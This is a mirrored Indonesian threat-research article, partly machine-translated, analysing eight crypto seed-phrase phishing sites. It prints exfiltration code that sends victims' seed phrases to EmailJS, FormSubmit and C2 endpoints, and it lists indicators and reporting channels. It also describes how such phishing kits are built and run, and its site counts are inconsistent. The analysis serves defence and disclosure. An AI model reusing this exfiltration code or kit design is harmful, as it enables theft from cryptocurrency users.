Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / ID / PHISHING ANATOMY

8 Alat Pencuri Frasa Benih Telah Dianalisis Secara Terbalik

The Enablers Registry·Editorial mirror·/id/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Analisis Possibly phishing Kripto:
8 Serangan Nyata yang Dianalisis

Kami berhasil mencegat lalu lintas possibly phishing yang sedang berlangsung, melakukan rekayasa balik terhadap 5 program pencuri frasa benih, dan melacak data yang dicuri hingga ke bot [REDACTED], akun EmailJS, serta backend layanan Possibly phishing-as-a-Service.

27 Maret 2026 Penelitian THE ENABLERS REGISTRY Waktu baca: 18 menit
Analisis Penyelidikan Phishing Kripto
Analisis langsung terhadap lalu lintas possibly phishing yang disadap mengungkap seluruh infrastruktur serangan
8Situs yang Dianalisis
7Metode Eksfiltrasi
1,824+Kredensial yang Dicuri
380+Merek Dompet
$0Biaya Penyerang

Apa yang Kami Temukan

Setiap hari, ribuan pengguna mata uang kripto kehilangan dananya akibat situs possibly phishing yang tampak tak bisa dibedakan dari layanan dompet yang sah. Namun, apa yang terjadi di belakang Tombol "Connect Wallet" palsu itu? Ke mana sebenarnya frasa seed Anda disimpan?

Kami menyadap lalu lintas HTTP langsung dari 5 situs possibly phishing yang aktif, mengunduh kode sumber lengkapnya, dan melacak setiap titik akhir pengaliran data hingga ke tujuan akhirnya. Penyelidikan ini mengungkap seluk-beluk lengkap possibly phishing kripto modern — mulai dari trik rekayasa sosial yang membuat Anda mengetikkan frasa benih, hingga bot [REDACTED] yang mengirimkannya kepada penyerang secara real-time.

Pernyataan Penolakan Tanggung Jawab

Semua frasa benih yang ditampilkan dalam artikel ini merupakan data uji yang dihasilkan secara acak. Tidak ada kredensial asli yang bocor selama penyelidikan ini. Semua situs tersebut telah dilaporkan kepada penyedia layanan hosting dan departemen penanggulangan penyalahgunaan masing-masing.

Pola Serangan Universal

Meskipun memiliki merek dan sistem backend yang berbeda-beda, kesembilan situs possibly phishing tersebut mengikuti corong psikologis yang persis sama:

Halaman TujuanPembangunan kepercayaan
Pemilih Dompet60–110+ logo
Pesan palsu "Sedang terhubung..."Timer 3–5 detik
"Koneksi Gagal"Selalu gagal
Entri ManualBenih / Kunci / Penyimpanan Kunci
Pengeluaran dataTG / Email / API

Wawasan penting: animasi "Sedang terhubung..." selalu sudah diprogram sedemikian rupa agar gagal. Dalam kode sumber Situs #4, kami menemukan const success = false — tidak ada upaya untuk menghubungkan dompet. Seluruh alur ini hanya bertujuan untuk mengarahkan korban ke formulir "Hubungkan Secara Manual".

Rantai serangan phishing kripto enam langkah
Rantai serangan universal 6 langkah yang dimiliki oleh semua situs possibly phishing yang kami analisis

8 Lokasi: Rincian Lengkap

1
Protokol Lapisan Jaringan
[REDACTED]
LangsungIANA #1910 PagesBot [REDACTED] + EmailJS

Peniruan identitas

Sebuah "protokol terdesentralisasi" fiktif untuk validasi dompet. Menggunakan ticker harga CryptoCompare secara real-time dan tautan ke penjelajah blockchain asli (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) untuk menjamin kredibilitasnya. Halaman utama menampilkan lebih dari 100 logo dompet dan proses "validasi" dalam 3 langkah.

Rantai Eksfiltrasi Ganda

Backend yang paling canggih di antara kelima sistem tersebut — setiap kredensial yang dicuri dikirim melalui dua saluran independen secara bersamaan:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Temuan OSINT

IndikatorNilai
Email PenipuBestgrace309@gmail.com
Bot [REDACTED]@DewdropsTG_bot (ID: 7567323692)
Penerima [REDACTED]@metatech2 (ID Obrolan: 7350941887)
Backend[REDACTED]
Layanan EmailJSservice_d5qigxs / template_7bqxeaa
Domain Tersembunyilayerschain.in (dari penyamaran alamat email CF)
Pesan yang Dikirim1.824+ (dari ID pesan [REDACTED])
Usia Domain2 hari (TLS: 25 Maret 2026)
Kegagalan OPSEC

Alamat email pelaku ditemukan di sebuah Komentar JavaScript di dalam config.js: // Bestgrace309@gmail.com. Mereka lupa menghapusnya sebelum melakukan deployment. Selain itu, backend relay [REDACTED] sepenuhnya terbuka — tanpa otentikasi, tanpa pembatasan laju. Dengan mendekode IANA #1910's data-cfemail Selain teknik pengaburan dalam kode HTML, kami juga menemukan alamat email tersembunyi: support@layerschain.in, yang terhubung dengan infrastruktur hosting di India dan Afrika Selatan.

2
Migrasi Token AQLA
[REDACTED]
LangsungIANA #1910 PagesFormulir yang Tidak Statis

Peniruan identitas

Penyalinan yang sempurna hingga tingkat piksel dari dunia nyata Aqualibre (AQLA) halaman migrasi token. Kode HTML tersebut berisi tag metadata yang menunjukkan sumbernya: data-scrapbook-source="https://token.[REDACTED]/migration", bertanggal 19 November 2024.

Pendekatan Tanpa Kode

Penyerang ini memerlukan tanpa kode di sisi server. Formulir tersebut mengirimkan data secara langsung ke Tidak statis — sebuah backend formulir yang sah untuk situs statis. Setiap pengiriman data diteruskan ke alamat email penipu. Alamat email penyerang adalah tidak pernah terlihat dalam kode sumber.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Biaya: $0

IANA #1910 Pages: gratis. Un-static Forms: gratis. Tidak ada domain yang dibeli. Tidak ada server yang disewa. Total biaya infrastruktur: nol dolar.

3
[REDACTED] Typosquat
[REDACTED]
Langsung IANA #1910 Pages Formulir yang Tidak Statis

Peniruan identitas

Subdomain tersebut berisi "safpal" — sebuah kesalahan ejaan yang disengaja dari [REDACTED], sebuah dompet perangkat keras yang populer. Situs tersebut menyamar sebagai "Blockchain Wallet Rectification" dengan 26 kategori masalah palsu. Menggunakan Typed.js untuk menampilkan animasi nama-nama rantai (Ethereum, BSC, Polygon...) dan ticker LiveCoinWatch untuk menambah kesan kredibilitas.

Perangkat yang Sama, Operator yang Sama?

Menggunakan templat possibly phishing yang persis sama sebagai Lokasi #2: sama persis connect.html, sama persis wallets.html dengan lebih dari 60 logo, menggunakan backend Un-static yang sama (ID formulir yang berbeda — 6f1b82c3...da9943af). Kit yang identik tersebut sangat mengindikasikan satu operator yang mengelola kedua situs tersebut.

Hal-hal yang perlu diperhatikan dalam kode: "Privay Policy" (kurang huruf 'c'), "seperated" (seharusnya "separated"), "Kestore" (kurang huruf 'y'). Kolom kata sandi menggunakan type="text" daripada type="password".

4
Klon Jaringan Flare
[REDACTED]
LangsungIANA #1910 PagesEmailJS Ganda (Redundansi)

Peniruan identitas

Sebuah tiruan yang nyaris sempurna dari Jaringan Flare portal — blockchain EVM Layer-1 sejati yang dilengkapi dengan protokol FTSO dan Data Connector. Meniru lebih dari 30 mitra ekosistem, antarmuka navigasi, dan identitas merek. Favicon dimuat dari domain typosquat: [REDACTED] (ada satu huruf 'n' yang hilang dari kata "mainnet").

Redundansi Ganda EmailJS

Satu-satunya situs yang menggunakan dua akun EmailJS yang berbeda secara bersamaan untuk redundansi anti-Penghapusan:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Subjek email untuk setiap kasus pencurian: "New Wallet Details from Flare".

Ini Adalah Bisnis yang Mendapat Pendanaan

HTML tersebut berisi Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Perlindungan PPC Lunio, dan sebuah Piksel Iklan Twitter/X. Penyerang sedang menjalankan iklan berbayar untuk mengarahkan korban ke situs possibly phishing dan menyaring klik bot. Ini bukan sekadar hobi — ini adalah operasi yang didanai dengan sistem analitik dan anggaran iklan.

Situs phishing Flare Network yang menggunakan kombinasi EmailJS dan iklan berbayar
Situs #4: iklan berbayar, pelacakan analitik, dan eksfiltrasi ganda — operasi yang paling profesional
5
COIN NODE / Perbaikan Dompet (PhaaS)
[REDACTED]
Backend MatiAPI PulseResolve (PhaaS)

Peniruan identitas

Layanan "COIN NODE" / "Wallet Fix" umum (tanpa merek tertentu). Hak Cipta "Wallet Fix 2022" — templat kit ini sudah berumur setidaknya 4 tahun. Gambar-gambar dihosting di [REDACTED] (WordPress di AWS).

Possibly phishing sebagai Layanan

Arsitektur backend yang paling mengkhawatirkan: sebuah API multi-tenant berbasis UUID:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Setiap penipu mendapatkan titik akhir UUID masing-masing. Seorang operator pusat mengelola API tersebut, memantau kampanye, dan kemungkinan mengambil bagian dari dana yang dicuri. Ini adalah pencurian kripto yang dilakukan secara terorganisir — model Possibly phishing-as-a-Service.

Infrastruktur Terkait (Sebagian Besar Sudah Tidak Berfungsi)

DomainPeranStatus
[REDACTED]API EksfiltrasiNXDOMAIN
[REDACTED]Host faviconNXDOMAIN
[REDACTED]Logo tuan rumahNXDOMAIN
[REDACTED]CDN GambarLangsung (AWS)
Antarmuka Pengguna Zombie

Backend-nya sudah mati, tapi... Frontend masih aktif di IANA #1910 Pages. Jika penyerang mendaftarkan ulang [REDACTED], situs tersebut langsung dapat diakses kembali.

6
Pusat Bantuan + Pemulihan Buku Besar
[REDACTED] & [REDACTED]-recovery.support
LangsungIANA #1910 Pages + ReplitAPI C2 KhususPengisian Otomatis BIP39

Peniruan identitas

A operasi dua arah: sebuah "Pusat Bantuan" umum di [REDACTED] dengan 15 kategori penerbitan palsu dan 39 merek dompet, ditambah sebuah Klon proses orientasi pengguna [REDACTED] yang persis sama hingga tingkat piksel di [REDACTED]-recovery.support dijalankan di Replit — lengkap dengan pilihan model perangkat, pengaturan PIN, dan kisi frasa benih berisikan 24 kata dengan Fitur autocomplete BIP39 yang sesungguhnya.

Backend C2 Anti-Pemindai

Halaman dukungan dompet mengirimkan data yang dicuri ke [REDACTED]/log — server C2 berbasis nginx/Ubuntu yang disesuaikan dan berada di balik IANA #1910. Bagian belakang secara sengaja memblokir semua permintaan GET (mengembalikan kode kesalahan 522 (timeout)), hanya merespons permintaan POST. Artinya, pemindai URL, crawler Google Safe Browsing, dan peneliti keamanan yang mengirimkan permintaan GET ke titik akhir tersebut tidak mendapatkan respons apa pun — server C2 tampak tidak aktif.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Klon [REDACTED] ini menjalankan backend Express.js terpisah di Replit itu sendiri: POST /api/recovery-phrase mengumpulkan {deviceId, pin, phrase}. Hasilnya adalah 400 {"error":"Invalid data provided"} jika terjadi input yang tidak valid — untuk memastikan bahwa backend tersebut berlangsung dan sedang dilakukan validasi secara aktif data yang dicuri.

Temuan OSINT

IndikatorNilai
Frontend (Dompet)[REDACTED]
Frontend ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
C2 Backend [REDACTED] → nginx/1.24.0 Ubuntu
Alamat IP C2104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Verifikasia43d3852-5304-47af-a61b-f0f6f3912736
Petugas Pendaftaran[REDACTED] ([REDACTED]-recovery.support)
Telah diterapkan9 Januari 2026 (header Last-Modified)
Teknologi yang Digunakan React + Vite + Tailwind v4.1 + Framer Motion
Tingkat Ketepatan UX Tertinggi

Paket JS berukuran 466 KB tersebut berisi daftar kata BIP39 lengkap untuk fitur autocomplete real-time, terdapat 67 referensi ke "passphrase" dan 39 ke "mnemonic". Klon [REDACTED] ini memandu korban melalui alur pendaftaran yang persis sama dengan perangkat [REDACTED] asli — halaman possibly phishing paling meyakinkan dalam seluruh penyelidikan ini. Halaman tersebut apiKey Kolom dalam konfigurasi tersebut menyarankan sebuah arsitektur PhaaS multi-tenant.

7
Platform Peluncuran Terdesentralisasi
[REDACTED]
LangsungIANA #1910 PagesFormSubmit.co

Peniruan identitas

Sebuah "Decentralized Launchpad" umum dengan 21 kategori umpan (Staking, Migrasi, KYC, Giveaway, Klaim Hadiah, Pemulihan Aset, Prapenjualan, Pencetakan NFT, Akun yang Terkunci...) dan Lebih dari 70 merek dompet — salah satu daftar dompet paling lengkap yang pernah kami temui. Kesalahan ketik yang mencolok, yaitu "Sychronize" (tanpa huruf 'n'), mengungkap bahwa itu palsu.

Pipa FormSubmit Pipeline

Kegunaan FormSubmit.co — layanan pengiriman formulir ke email yang sah. Hash titik akhir a2cf4131f1a5d39453c7c183df96f86f adalah nilai MD5 dari alamat email penipu tersebut. Kami mencoba ratusan pola alamat email secara acak di Gmail, Yahoo, Hotmail, ProtonMail, Yandex, dan [REDACTED]tidak ada yang cocok. Penipu tersebut menggunakan alamat email yang tidak umum atau dihasilkan secara acak.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Temuan OSINT

IndikatorNilai
Domain[REDACTED]
Hash FormSubmita2cf4131f1a5d39453c7c183df96f86f
ID KampanyeDAPP DESENTRALISASI
FontAwesome Kitbdc3291137 (kit #112310842, versi gratis v6.7.2)
jQuery3.2.1 + 3.5.1 dimuat secara bersamaan
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (tidak cocok)
Dua Pegangan Pelacak

FontAwesome Kit bdc3291137 — FontAwesome dapat mengidentifikasi pemilik akun di balik ID kit ini. Tag kampanye DAPP DECENTRALIZED mungkin muncul di situs possibly phishing lain yang menggunakan hash FormSubmit yang sama. Setelah mencuri frasa benih, seorang kode QR palsu dan kode referensi acak yang terdiri dari 7 karakter ditampilkan: "Hubungi Admin dengan kode referensi unik Anda" — membuat para korban terus menunggu alih-alih melakukan penyelidikan.

8
R2 Bucket + PHP di Komputer Pribadi
pub-519769e9eb634616b1746c2018641d56.r2.dev
MatiIANA #1910 R2PHP + DDNS

Peniruan identitas

Tidak diketahui — baik frontend maupun backend sedang offline. Berdasarkan struktur payload, ini adalah serangan pencurian frasa benih dompet kripto. Serangan ini Bucket publik IANA #1910 R2 (penyimpanan objek, bukan Pages) adalah sebuah vektor possibly phishing yang telah didokumentasikan dengan baik dengan lebih dari 5.000 halaman berbahaya yang teridentifikasi dan peningkatan lalu lintas sebesar 61 kali lipat yang dilaporkan oleh Netskope.

Pengaturan Script Kiddie

Yang paling operasi dasar dalam koleksi ini. Frasa benih dikirim kata demi kata ke skrip PHP yang berjalan di komputer pribadi atau VPS yang terhubung ke layanan DNS gratis:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Temuan OSINT

IndikatorNilai
Frontend pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Backend [REDACTED] [NXDOMAIN]
ID R2 Bucket519769e9eb634616b1746c2018641d56
Penyedia DDNS [REDACTED] / [REDACTED] (Cincinnati, OH)
DNS NSns10–[REDACTED]
Nama Penggunamercifuljigga4real123
Nama Pengguna OSINT: mercifuljigga4real123

"Merciful" + "jigga" (julukan Jay-Z) + "4real" + "123" — nama pengguna yang sangat personal dan menunjukkan kecintaannya pada budaya hip-hop. Tidak ditemukan di platform mana pun yang terindeks: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, atau [REDACTED]. Kemungkinan aktif di [REDACTED], [REDACTED], atau platform game dengan nama ini atau variasi yang mirip. Nama file fuc.php sesuai dengan gaya yang tidak konvensional dari gagangnya.

7 Cara untuk Mencuri Frasa Benih Anda

Perbandingan Empat Metode Eksfiltrasi Data Melalui Phishing Kripto
Tujuh arsitektur eksfiltrasi yang berbeda yang digunakan di delapan situs possibly phishing tersebut
MetodeSitusCara KerjanyaKecepatanBiaya
Bot [REDACTED]#1 Express.js di [REDACTED] bertindak sebagai perantara ke Bot API. Penipu langsung menerima pesan langsung (DM) berisi kredensial. Secara real-time$0
EmailJS#1, #4 JavaScript sisi klien mengirimkan data secara langsung ke API EmailJS, yang kemudian meneruskannya ke alamat email penipu. ~1 menit$0
Formulir yang Tidak Statis#2, #3 Formulir HTML standar dengan metode POST ke layanan formulir yang sah, yang meneruskan kiriman melalui email. ~1 menit$0
FormSubmit.co#7 jQuery AJAX ke FormSubmit.co. Alamat email disembunyikan di balik hash MD5. Kampanye diberi tag "DAPP DECENTRALIZED". ~1 menit$0
API C2 Khusus#6 [REDACTED] mengirimkan permintaan ke API nginx/Express yang berada di balik IANA #1910. Menolak permintaan GET (522) untuk menghindari pemindai. Hanya merespons permintaan POST. Secara real-time~$5 per bulan
PHP + DDNS#8 Skrip PHP di komputer pribadi melalui layanan DNS gratis ([REDACTED]). Frasa benih dikirim kata demi kata. Secara real-time$0
API PhaaS#5 API multi-tenant berbasis UUID. Operator pusat mengelola bagian belakang sistem, sedangkan para penipu menyewa titik akhir. Secara real-timeTidak diketahui

7 Tanda Peringatan yang Mengungkap Setiap Situs Possibly phishing

Jika Anda melihat apa pun Jika Anda menemui hal-hal berikut, segera tutup tab tersebut:

1. Pesan "Koneksi Gagal" selalu palsu

Koneksi dompet yang sesungguhnya menggunakan protokol WalletConnect atau ekstensi browser. Koneksi tersebut tidak pernah menampilkan pesan kesalahan "Koneksi Gagal" yang meminta Anda untuk memasukkan frasa benih.

2. 50–110+ logo dompet digital, satu platform

Setiap ikon dompet mengarah ke formulir yang sama. Layanan yang sesungguhnya akan mengintegrasikan SDK asli dari masing-masing dompet.

3. "Kesalahan" setelah Anda mengirimkan

Pesan kesalahan palsu "503 Error" atau "Unknown Error" yang muncul setelah pengiriman dilakukan secara sengaja. Data Anda sudah dicuri — pesan kesalahan tersebut bertujuan menipu Anda agar mencoba lagi dengan dompet digital lain.

4. Di-hosting di .pages.dev

Kelima situs tersebut menyalahgunakan layanan gratis IANA #1910 Pages. Tidak diperlukan verifikasi identitas. Penyalahgunaan IANA #1910 Pages untuk aksi possibly phishing meningkat sebesar 198% pada tahun 2025.

5. Tiga tab: Frasa / Kunci Pribadi / Keystore

Tidak ada layanan resmi yang memerlukan ketiga jenis kredensial tersebut. Formulir dengan tiga tab ini merupakan ciri khas dari perangkat possibly phishing.

6. Tidak ada interaksi dengan blockchain

Tak satu pun dari situs-situs ini bisa dimuat ethers.js, web3.js, atau melakukan panggilan RPC apa pun. Itu hanyalah formulir HTML murni yang menyamar sebagai dApps.

7. Infrastruktur tanpa biaya

Hosting gratis + layanan formulir gratis + layanan pesan gratis = operasi possibly phishing lengkap dengan biaya $0. Jika situs tersebut tidak memiliki domain asli, waspadalah.

Tabel IOC Lengkap

Bagi tim keamanan, platform intelijen ancaman, dan pelapor penyalahgunaan:

Domain & Infrastruktur

DomainJenisStatus
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]Backend relai TGLangsung
[REDACTED]Aset typosquatTidak diketahui
layerschain.inDomain terkaitDNS tidak berfungsi
[REDACTED]Backend PhaaSNXDOMAIN
[REDACTED]Penyedia asetNXDOMAIN
[REDACTED]Logo tuan rumahNXDOMAIN
[REDACTED]CDN GambarLangsung (AWS)
[REDACTED]Antarmuka possibly phishingLangsung
[REDACTED]-recovery.supportPossibly phishing [REDACTED] (Replit)Langsung
[REDACTED]Backend C2 (nginx/Ubuntu)Langsung
[REDACTED]Domain akar404
[REDACTED]Antarmuka possibly phishingLangsung
pub-519769e9eb634616b1746c2018641d56.r2.devPossibly phishing (kelompok R2)Offline
[REDACTED]Backend PHP (DDNS)NXDOMAIN

Akun & Pengenal

JenisNilaiSitus
EmailBestgrace309@gmail.com#1
Email (disembunyikan)support@layerschain.in#1
Bot [REDACTED]@DewdropsTG_bot (7567323692)#1
Pengguna [REDACTED]@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Formulir yang Tidak Statisc78173e2d991...94c3f76#2
Formulir yang Tidak Statis6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instansi Renderrndr-id: ed83576e-b1b3-4c82#1
Replit Verifikasia43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 Pengiriman Formulira2cf4131f1a5d39453c7c183df96f86f#7
Tag KampanyeDAPP DESENTRALISASI#7
FontAwesome Kitbdc3291137 (kit #112310842)#7
ID R2 Bucket519769e9eb634616b1746c2018641d56#8
Nama Pengguna/DDNSmercifuljigga4real123#8

Ke Mana Harus Melaporkan Upaya Possibly phishing Terkait Kripto

Ke mana harus melaporkan situs phishing kripto — penghapusan multi-vektor
Menargetkan layanan hosting, layanan backend, dan platform pesan secara bersamaan untuk kecepatan penghapusan yang maksimal
LayananApa yang Harus DilaporkanBagaimana
IANA #19107x .pages.dev + 1x bucket R2abuse.IANA #1910.com
Google Safe BrowsingSemua URL possibly phishingLaporkan Possibly phishing
PhishTankSemua URL untuk daftar blokir komunitas[REDACTED]
EmailJS3 akun yang disalahgunakan (ID layanan di atas)abuse@emailjs.com
Tidak statis2 titik akhir formulirHubungi kami melalui [REDACTED]
[REDACTED]Backend relai [REDACTED]Formulir pelaporan penyalahgunaan
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comLaporan penyalahgunaan Google
Twitter/XAkun iklan yang mempromosikan Situs #4Laporan penyalahgunaan iklan X
FormSubmit.coHash a2cf4131... (#7)Formulir Pengaduan Penyalahgunaan FormSubmit
Replit[REDACTED]-recovery.support (#6)Laporan penyalahgunaan Replit
[REDACTED]Pendaftar untuk [REDACTED]-recovery.supportPelaporan Penyalahgunaan di [REDACTED]
DNSExit[REDACTED]Penyalahgunaan [REDACTED]
FontAwesomeKit bdc3291137 (#7)Penyalahgunaan FontAwesome
ChainabuseSemua kampanye possibly phishing[REDACTED]

Cara Melindungi Diri Anda

Aturan Emas

Tidak ada layanan resmi pun yang akan meminta Anda untuk memasukkan frasa benih Anda ke dalam situs web. Frasa benih hanya dimasukkan ke dalam perangkat lunak dompet resmi saat proses pemulihan dompet — jangan pernah dimasukkan di situs web pihak ketiga yang mengklaim sebagai layanan "validasi", "sinkronisasi", atau "pemulihan".

Sebelum menghubungkan dompet apa pun:

  • Pastikan URL tersebut sesuai dengan domain resmi. Periksa detail sertifikat SSL.
  • WalletConnect yang asli menggunakan kode QR atau tautan langsung — bukan formulir frasa benih.
  • Jika "koneksi gagal" dan Anda diminta memasukkan kredensial secara manual — itu adalah serangan possibly phishing.
  • Periksa URL yang mencurigakan di PhishTank atau VirusTotal sebelum berinteraksi.
  • Gunakan dompet perangkat keras — dompet ini memerlukan konfirmasi fisik untuk setiap transaksi.
  • Tandai URL resmi. Jangan pernah mengklik tautan dari iklan, pesan langsung (DM), atau media sosial.

Taksonomi Possibly phishing Kripto

Penipu yang mencuri frasa benih hanyalah salah satu kategori. Berikut ini gambaran lengkap tentang possibly phishing kripto — kami akan menyajikan pembahasan mendalam mengenai setiap jenisnya.

Pencuri Frasa Benih
Halaman palsu "Connect Wallet" yang menipu Anda agar memasukkan frasa pemulihan Anda. Fokus artikel ini — 5 contoh nyata yang dianalisis secara mendalam.
Telah Dibahas di Atas
Penyalahgunaan Proses Persetujuan
Aplikasi terdesentralisasi (dApps) berbahaya yang meminta persetujuan penggunaan token tanpa batas melalui [REDACTED]. Begitu disetujui, penyerang akan menguras dompet Anda tanpa perlu mengetahui frasa benih Anda.
Segera Hadir
Ice Possibly phishing (Permit2)
Memanfaatkan celah keamanan pada izin tanpa gas EIP-2612. Korban menandatangani pesan di luar rantai yang memberikan hak transfer token — tidak ada persetujuan di dalam rantai yang terlihat hingga proses pengurasan terjadi.
Segera Hadir
Klaim Airdrop Palsu
Airdrop token palsu yang mengharuskan Anda "mengklaim" melalui kontrak pintar berbahaya. Transaksi klaim tersebut sebenarnya memindahkan token asli Anda ke luar.
Segera Hadir
Program yang Mencuri Data dari Clipboard
Malware yang memantau papan klip Anda dan secara diam-diam mengganti alamat dompet yang telah disalin dengan alamat penyerang sebelum Anda menempelkannya.
Segera Hadir
Membersihkan Debu + Keracunan
Transaksi-transaksi kecil dari alamat yang mirip mengotori riwayat Anda. Korban menyalin alamat palsu tersebut dari riwayat transaksi untuk transfer berikutnya.
Segera Hadir

Kebenaran yang Tak Nyaman

Biaya yang diperlukan untuk menyiapkan operasi possibly phishing kripto $0 dan membutuhkan kurang dari 30 menit. Layanan hosting gratis, layanan formulir gratis, bot pesan gratis. Pelaku serangan di balik Situs #1 telah mencuri kredensial dari 1.824+ korban. Situs #4 sedang beroperasi iklan berbayar secara besar-besaran. Ini bukan main-main — ini adalah sebuah industri. Satu-satunya cara untuk melindungi diri adalah dengan meningkatkan kewaspadaan.

Bantu Kami Melawan

THE ENABLERS REGISTRY melacak dan melaporkan situs possibly phishing kripto secara real-time. Jika Anda menemukan situs yang mencurigakan, laporkan kepada kami — kami akan menyelidikinya dan berupaya agar situs tersebut ditutup.

Penyelidikan Terkait

Penyelidikan
Akhir dari [REDACTED]: IANA #1479 Berbohong untuk Melindungi Seorang Pencuri
Pencurian Monero yang berlangsung selama 10 tahun. Tiga penyedia layanan pendaftaran domain terlibat. IANA #1479 mengarang 7 kebohongan.
Analisis Mendalam
Jaringan Penyedot Kripto: Infrastruktur yang Terungkap
Bagaimana layanan "drainer-as-a-service" berbagi infrastruktur dan operator.
Panel Terbuka
Panel Possibly phishing [REDACTED]: Akses Admin Penuh
Kami berhasil mengakses panel admin dari operasi possibly phishing [REDACTED].
Infrastruktur
Infrastruktur Penipuan Terungkap: Backend Bersama
Bagaimana operasi penipuan berbagi server, templat, dan alur pembayaran.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings